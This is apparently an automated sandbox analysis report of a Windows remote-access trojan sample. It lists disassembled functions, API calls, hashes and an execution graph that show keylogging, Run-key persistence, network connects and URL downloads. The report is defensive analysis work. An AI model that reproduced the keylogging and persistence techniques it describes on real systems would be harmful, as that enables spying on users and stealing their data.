                                                  • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                  • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                  • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID: T=G$T=G
                                                  • API String ID: 3519838083-3732185208
                                                  • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                  • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                  • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                  • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                  APIs
                                                  • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                    • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                    • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                    • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                    • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                    • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                    • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                    • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(00000000,?,00000000,0040A91C,00000000), ref: 00409D84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                  • String ID: [AltL]$[AltR]
                                                  • API String ID: 2738857842-2658077756
                                                  • Opcode ID: fabf8009bc8052d854f4165284eb6e136b80ba41f48a7cdcd541ad1136e697fa
                                                  • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                  • Opcode Fuzzy Hash: fabf8009bc8052d854f4165284eb6e136b80ba41f48a7cdcd541ad1136e697fa
                                                  • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                  APIs
                                                    • Part of subcall function 0210A8ED: GetLocalTime.KERNEL32(00000000), ref: 0210A907
                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0210A1CB
                                                  • Sleep.KERNEL32(00002710), ref: 0210A1E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HandleLocalModuleSleepTime
                                                  • String ID: `#v
                                                  • API String ID: 1683243174-272240289
                                                  • Opcode ID: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                  • Instruction ID: ed028a636a5f5b03d60b220f16c3d02d241774bf2f62fb3d240cc237d925bc64
                                                  • Opcode Fuzzy Hash: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                  • Instruction Fuzzy Hash: B7E01226B9431437552033AA7C4EC6F3D29EAC2B6174100BAFB0596195ED4008119AFB
                                                  APIs
                                                  • _free.LIBCMT ref: 00448825
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast_free
                                                  • String ID: `@$`@
                                                  • API String ID: 1353095263-20545824
                                                  • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                  • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                  • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                  • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                  APIs
                                                  • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State
                                                  • String ID: [CtrlL]$[CtrlR]
                                                  • API String ID: 1649606143-2446555240
                                                  • Opcode ID: 1070bbf3275b1229c1c7efbb4f5439c97c9f3804cf481e3ede6732aa45a47047
                                                  • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                  • Opcode Fuzzy Hash: 1070bbf3275b1229c1c7efbb4f5439c97c9f3804cf481e3ede6732aa45a47047
                                                  • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C33C,00000000,?,00000000), ref: 00412988
                                                  • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00412998
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteOpenValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 2654517830-1051519024
                                                  • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                  • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                  • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                  • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,020FC5A3,00000000,?,00000000), ref: 02102BEF
                                                  • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 02102BFF
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 02102BED
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteOpenValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 2654517830-1051519024
                                                  • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                  • Instruction ID: 9ffaf82c64c481336881d4aac8b9a43ad9b9b93ce027c2a229cd68330e4f33e1
                                                  • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                  • Instruction Fuzzy Hash: B6E01270240308BAEF104FA1AD4AF9B37ACEB41B89F004164F902E50D1D3B5D904AA54
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,020FDC11,0000000D,00000033,00000000,00000032,00000000,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 020FC14D
                                                  • GetLastError.KERNEL32 ref: 020FC158
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateErrorLastMutex
                                                  • String ID: Rmc-I7G983
                                                  • API String ID: 1925916568-3173645232
                                                  • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                  • Instruction ID: cba1f3d4defd99d7a4475c523711288308af749f3589a7980429a1828ffaaad4
                                                  • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                  • Instruction Fuzzy Hash: A3D012717483019BD7281B747D897693555E784703F004079B60FC59D1CF648840A915
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(0046BA90,0046BA80), ref: 020F16A1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 020F16A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: `#v
                                                  • API String ID: 1646373207-272240289
                                                  • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                  • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                  • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                  • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CommandLine
                                                  • String ID: h'X
                                                  • API String ID: 3253501508-116402217
                                                  • Opcode ID: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                  • Instruction ID: 13d69598d350970c9b91df73096b24a53109b9b907d0ea4b726438dfa3130670
                                                  • Opcode Fuzzy Hash: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                  • Instruction Fuzzy Hash: 09B0027D8157009FC7419F79BD5D1443BA0B75861339094B5DC19C7B35DA358085EF18
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                  • GetLastError.KERNEL32 ref: 0043FB02
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1717984340-0
                                                  • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                  • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                  • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                  • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,020F1D3F), ref: 0212FD5B
                                                  • GetLastError.KERNEL32 ref: 0212FD69
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0212FDC4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1717984340-0
                                                  • Opcode ID: 51d5f03fba1b172d5651f1593246994e43d26d1415dc77cb91aa80c4233d165d
                                                  • Instruction ID: d165237888af6859c0015164204ef0198f337930bf2e3eed997c50a1035b7301
                                                  • Opcode Fuzzy Hash: 51d5f03fba1b172d5651f1593246994e43d26d1415dc77cb91aa80c4233d165d
                                                  • Instruction Fuzzy Hash: 8A415E3564032AAFCF268F64C844BBA7BB5EF01324F25416DF85957691EB318827CB50

                                                  Execution Graph

                                                  Execution Coverage: 2.4%
                                                  Dynamic/Decrypted Code Coverage: 22.8%
                                                  Signature Coverage: 0%
                                                  Total number of Nodes: 1367
                                                  Total number of Limit Nodes: 55
                                                  execution_graph 86926 41d4d0 86928 41d4e6 ctype ___scrt_fastfail 86926->86928 86927 41d6e3 86932 41d734 86927->86932 86942 41d071 RtlDeleteCriticalSection RtlEnterCriticalSection RtlLeaveCriticalSection ___scrt_fastfail 86927->86942 86928->86927 86930 431f99 21 API calls 86928->86930 86935 41d696 ___scrt_fastfail 86930->86935 86931 41d6f4 86931->86932 86933 41d760 86931->86933 86943 431f99 86931->86943 86933->86932 86951 41d474 21 API calls ___scrt_fastfail 86933->86951 86935->86932 86937 431f99 21 API calls 86935->86937 86940 41d6be ___scrt_fastfail 86937->86940 86938 41d72d ___scrt_fastfail 86938->86932 86948 43264f 86938->86948 86940->86932 86941 431f99 21 API calls 86940->86941 86941->86927 86942->86931 86944 431fa3 86943->86944 86945 431fa7 86943->86945 86944->86938 86952 43a88c 86945->86952 86961 43256f 86948->86961 86950 432657 86950->86933 86951->86932 86957 446aff _strftime 86952->86957 86953 446b3d 86960 445354 20 API calls _free 86953->86960 86955 446b28 RtlAllocateHeap 86956 431fac 86955->86956 86955->86957 86956->86938 86957->86953 86957->86955 86959 442200 7 API calls 2 library calls 86957->86959 86959->86957 86960->86956 86962 432588 86961->86962 86966 43257e 86961->86966 86963 431f99 21 API calls 86962->86963 86962->86966 86964 4325a9 86963->86964 86964->86966 86967 43293a CryptAcquireContextA 86964->86967 86966->86950 86968 432956 86967->86968 86969 43295b CryptGenRandom 86967->86969 86968->86966 86969->86968 86970 432970 CryptReleaseContext 86969->86970 86970->86968 86971 426030 86976 4260f7 recv 86971->86976 86977 426091 86982 42610e send 86977->86982 86983 425e56 86984 425e6b 86983->86984 86990 425f0b 86983->86990 86985 425f25 86984->86985 86986 425f5a 86984->86986 86987 425eb9 86984->86987 86988 425f77 86984->86988 86989 425f9e 86984->86989 86984->86990 86996 425eee 86984->86996 87011 424354 48 API calls ctype 86984->87011 86985->86986 86985->86990 87014 41f075 52 API calls 86985->87014 
[Execution Graph: the report's interactive call graph is flattened here into a node/edge listing (function addresses, edge pairs and "N API calls" annotations) that is not readable as text. Windows API calls annotated on the graph nodes include: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA, GetModuleHandleA/W, GetProcAddress, GetPEB, SetErrorMode, FindResourceA, LoadResource, LockResource, SizeofResource, InternetOpenW, InternetOpenUrlW, InternetReadFile, InternetCloseHandle, CreateMutexA, RegOpenKeyExA/W, RegQueryValueExA/W, RegCreateKeyA/W, RegSetValueExA/W, RegDeleteValueW, RegCloseKey, CreateProcessA, ShellExecuteW, CreateThread, CreateEventA/W, ExitProcess, TerminateProcess, SetProcessDEPPolicy, WSAStartup, socket, connect, WSAGetLastError, WSASetLastError, GetComputerNameExW, GetUserNameW, GetCurrentProcess, IsWow64Process, GetLocalTime, GetTickCount, GetLastInputInfo, GetForegroundWindow, GetWindowTextW, GlobalMemoryStatusEx, GetLocaleInfoA, GetModuleFileNameW, GetLongPathNameW, CreateDirectoryW, CopyFileW, DeleteFileW, SetFileAttributesW, CloseHandle, Sleep, IsDebuggerPresent, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, RtlEnterCriticalSection, RtlLeaveCriticalSection, RtlDeleteCriticalSection, RtlReAllocateHeap, RtlFreeHeap, GetLastError, StrToIntA.]
88435->88424 88436->88417 88437->88431 88439 440a64 88438->88439 88441 440a9b __fread_nolock 88439->88441 88442 445354 20 API calls _free 88439->88442 88441->88334 88442->88441 88450 4046a3 88443->88450 88444 4047d8 88445 401eea 11 API calls 88444->88445 88446 4047e1 88445->88446 88446->88366 88447 403b60 28 API calls 88447->88450 88448 401eef 11 API calls 88448->88450 88449 401eea 11 API calls 88449->88450 88450->88444 88450->88447 88450->88448 88450->88449 88451 401fbd 28 API calls 88450->88451 88452 401ebd 28 API calls 88450->88452 88451->88450 88453 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 88452->88453 88453->88450 88456 414b9b 88453->88456 88454->88377 88455->88372 88457 401fbd 28 API calls 88456->88457 88458 414bbd SetEvent 88457->88458 88459 414bd2 88458->88459 88460 403b60 28 API calls 88459->88460 88461 414bec 88460->88461 88462 401fbd 28 API calls 88461->88462 88463 414bfc 88462->88463 88464 401fbd 28 API calls 88463->88464 88465 414c0e 88464->88465 88466 41afc3 28 API calls 88465->88466 88467 414c17 88466->88467 88468 414db5 88467->88468 88470 414db0 88467->88470 88471 414c37 GetTickCount 88467->88471 88469 401d8c 11 API calls 88468->88469 88472 4161fb 88469->88472 88470->88468 88536 404ab1 88470->88536 88473 41ad46 28 API calls 88471->88473 88474 401eea 11 API calls 88472->88474 88475 414c4d 88473->88475 88477 416207 88474->88477 88535 41aca0 GetLastInputInfo GetTickCount 88475->88535 88479 401eea 11 API calls 88477->88479 88481 416213 88479->88481 88480 414c54 88482 41ad46 28 API calls 88480->88482 88483 414c5f 88482->88483 88484 41ac52 30 API calls 88483->88484 88485 414c6d 88484->88485 88486 41aec8 28 API calls 88485->88486 88487 414c7b 88486->88487 88488 401d64 28 API calls 88487->88488 88489 414c89 88488->88489 88546 4027ec 28 API calls 88489->88546 88491 414c97 88547 40275c 28 API calls 88491->88547 88493 414ca6 88494 4027cb 28 API calls 88493->88494 88495 414cb5 88494->88495 88548 40275c 28 API calls 88495->88548 88497 
414cc4 88498 4027cb 28 API calls 88497->88498 88499 414cd0 88498->88499 88549 40275c 28 API calls 88499->88549 88501 414cda 88550 404468 61 API calls ctype 88501->88550 88503 414ce9 88504 401eea 11 API calls 88503->88504 88505 414cf2 88504->88505 88506 401eea 11 API calls 88505->88506 88507 414cfe 88506->88507 88508 401eea 11 API calls 88507->88508 88509 414d0a 88508->88509 88510 401eea 11 API calls 88509->88510 88511 414d16 88510->88511 88512 401eea 11 API calls 88511->88512 88513 414d22 88512->88513 88514 401eea 11 API calls 88513->88514 88515 414d2e 88514->88515 88516 401e13 11 API calls 88515->88516 88517 414d3a 88516->88517 88518 401eea 11 API calls 88517->88518 88519 414d43 88518->88519 88520 401eea 11 API calls 88519->88520 88521 414d4c 88520->88521 88522 401d64 28 API calls 88521->88522 88523 414d57 88522->88523 88524 43a5e7 _strftime 39 API calls 88523->88524 88525 414d64 88524->88525 88526 414d69 88525->88526 88527 414d8f 88525->88527 88529 414d82 88526->88529 88530 414d77 88526->88530 88528 401d64 28 API calls 88527->88528 88534 414d99 88528->88534 88531 404915 104 API calls 88529->88531 88551 4049ba 81 API calls 88530->88551 88533 414d7d 88531->88533 88533->88468 88534->88468 88534->88470 88535->88480 88537 404b17 88536->88537 88538 404aba 88536->88538 88537->88468 88539 404ae7 CreateEventA SetEvent WaitForSingleObject CloseHandle 88538->88539 88540 401f66 28 API calls 88538->88540 88539->88537 88541 404ad0 88540->88541 88542 401f66 28 API calls 88541->88542 88543 404adf 88542->88543 88544 41a686 79 API calls 88543->88544 88545 404ae4 88544->88545 88545->88539 88546->88491 88547->88493 88548->88497 88549->88501 88550->88503 88551->88533 88555 40e56a 88553->88555 88554 4124b7 3 API calls 88554->88555 88555->88554 88556 40e60e 88555->88556 88557 4082dc 28 API calls 88555->88557 88558 40e59c 88555->88558 88559 40e5fe Sleep 88555->88559 88562 41ae08 28 API calls 88555->88562 88566 412774 14 API calls 88555->88566 88568 401e13 11 API calls 88555->88568 88571 
401f66 28 API calls 88555->88571 88575 4126d2 14 API calls 88555->88575 88560 4082dc 28 API calls 88556->88560 88557->88555 88586 40bf04 73 API calls ___scrt_fastfail 88558->88586 88559->88555 88563 40e619 88560->88563 88562->88555 88564 41ae08 28 API calls 88563->88564 88565 40e625 88564->88565 88567 412774 14 API calls 88565->88567 88566->88555 88569 40e638 88567->88569 88568->88555 88570 401e13 11 API calls 88569->88570 88572 40e644 88570->88572 88571->88555 88573 401f66 28 API calls 88572->88573 88574 40e655 88573->88574 88576 4126d2 14 API calls 88574->88576 88575->88555 88577 40e668 88576->88577 88587 411699 TerminateProcess WaitForSingleObject 88577->88587 88579 40e670 ExitProcess 88588 411637 62 API calls 88580->88588 88587->88579 88589 5f0000 88592 5f0006 88589->88592 88593 5f0015 88592->88593 88596 5f07a6 88593->88596 88597 5f07c1 88596->88597 88598 5f07ca CreateToolhelp32Snapshot 88597->88598 88599 5f07e6 Module32First 88597->88599 88598->88597 88598->88599 88600 5f07f5 88599->88600 88602 5f0005 88599->88602 88603 5f0465 88600->88603 88604 5f0490 88603->88604 88605 5f04d9 88604->88605 88606 5f04a1 VirtualAlloc 88604->88606 88605->88605 88606->88605

                                                  Control-flow Graph

                                                  Function 0040D767-0040E154 (the rendered graph is not reproduced, so the executed / not-executed block colouring is lost). Windows API calls by basic block, in address order: GetModuleFileNameW (0040D767); CreateThread (0040DD60); StrToIntA (0040DD87); CreateThread (0040DE68, 0040DEBD, 0040DF0E); SetProcessDEPPolicy (0040DFE0, reached on only one of the two edges out of 0040DFBA); CreateThread (0040DFE3, then 0040DFF8 and 0040E00D, the last two each on one of two possible edges); Sleep (0040E0DB) and DeleteFileW (0040E0ED) near the end. Every other block calls internal routines (the 00401Dxx/00401Exx/00401Fxx string helpers, 0041AE08, 0043A5E7, 00412902 and similar).
                                                  APIs
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\xenor\yavascript.exe,00000104), ref: 0040D790
                                                    • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                  Memory Dump Source
